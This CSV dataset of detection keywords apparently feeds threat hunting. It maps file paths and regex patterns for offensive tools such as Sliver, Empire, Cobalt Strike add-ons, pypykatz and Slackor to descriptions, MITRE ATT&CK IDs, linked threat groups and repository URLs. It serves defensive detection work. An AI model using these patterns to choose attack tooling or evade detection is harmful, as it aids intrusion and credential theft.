"*/Sitadel.git*",".{0,1000}\/Sitadel\.git.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","1","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","11307"
"*/sitadel.log*",".{0,1000}\/sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","11308"
"*/sitadel.py*",".{0,1000}\/sitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","1","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","11309"
"*/sites-available/striker*",".{0,1000}\/sites\-available\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11310"
"*/sites-enabled/striker*",".{0,1000}\/sites\-enabled\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11311"
"*/situational_awareness/*.exe",".{0,1000}\/situational_awareness\/.{0,1000}\.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11312"
"*/situational_awareness/*.ps1",".{0,1000}\/situational_awareness\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11313"
"*/skelsec/pypykatz*",".{0,1000}\/skelsec\/pypykatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","11314"
"*/skypev2-version.nse*",".{0,1000}\/skypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11315"
"*/sl0p.dll*",".{0,1000}\/sl0p\.dll.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","1","N/A","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","11316"
"*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11317"
"*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11318"
"*/Slackor/*",".{0,1000}\/Slackor\/.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11319"
"*/sleep_python_bridge/*",".{0,1000}\/sleep_python_bridge\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","11320"
"*/Sleeper/Sleeper.cna*",".{0,1000}\/Sleeper\/Sleeper\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","11321"
"*/sleepmask.cna*",".{0,1000}\/sleepmask\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","11322"
"*/slinky.py*",".{0,1000}\/slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11323"
"*/SlinkyCat.git*",".{0,1000}\/SlinkyCat\.git.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","11324"
"*/slip.git",".{0,1000}\/slip\.git","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","11325"
"*/slip-main.zip",".{0,1000}\/slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","11326"
"*/sliver.db-journal*",".{0,1000}\/sliver\.db\-journal.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","11327"
"*/sliver.exe*",".{0,1000}\/sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11328"
"*/sliver.git*",".{0,1000}\/sliver\.git.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11329"
"*/sliver.pb.go*",".{0,1000}\/sliver\.pb\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11330"
"*/sliver.proto*",".{0,1000}\/sliver\.proto.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11331"
"*/sliver/evasion/*",".{0,1000}\/sliver\/evasion\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11332"
"*/sliver_pb2.py*",".{0,1000}\/sliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11333"
"*/sliver_pb2_grpc.py*",".{0,1000}\/sliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11334"
"*/sliver-client*",".{0,1000}\/sliver\-client.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","11335"
"*/sliver-client.exe*",".{0,1000}\/sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11336"
"*/sliver-client_linux*",".{0,1000}\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11337"
"*/sliver-client_linux.sig*",".{0,1000}\/sliver\-client_linux\.sig.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11338"
"*/sliver-client_windows.exe*",".{0,1000}\/sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11339"
"*/sliver-client_windows-386*.exe*",".{0,1000}\/sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11340"
"*/sliver-client_windows-amd64*.exe*",".{0,1000}\/sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11341"
"*/sliver-client_windows-arm64*.exe*",".{0,1000}\/sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11342"
"*/sliverpb.Exe*",".{0,1000}\/sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11343"
"*/sliver-server*",".{0,1000}\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11344"
